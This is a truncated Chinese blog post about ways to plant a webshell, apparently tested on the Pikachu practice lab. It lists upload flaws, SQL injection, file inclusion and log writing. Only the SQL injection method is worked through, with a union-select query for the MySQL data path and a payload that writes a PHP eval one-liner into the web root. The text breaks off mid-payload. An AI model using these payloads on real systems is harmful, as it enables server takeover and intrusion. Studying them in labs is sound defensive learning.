写入webshell的几种方式

本文探讨了四种常见的webshell写入方法:上传漏洞、SQL注入、远程文件包含及HTTP错误日志写入。详细分析了每种方法的实现过程和相关技巧,如绕过前端限制、利用SQL注入获取root权限等。
摘要由CSDN通过智能技术生成

测试:pikachu平台
研究了几种写入webshell的方式
一、上传漏洞写入
包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html
二、sql注入写入
前提是有root权限
sql注入写入一句话木马
可以根据本地包含报错查找路径
C:\xampp\htdocs\pikachu\vul\fileinclude
也可以根据

union select 1,@@datadir查找mysql data路径

C:\xampp\mysql\data(但是没有开web访问权限也没有用的)
两种方法都可

union select 1,"<?php eval($_POST[666]);?>" into dumpfile "C:\\xampp\\htdocs\\pikachu\\vul\\fileinclude\\qimingfuckyou.php"
union select 1,"<?p
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值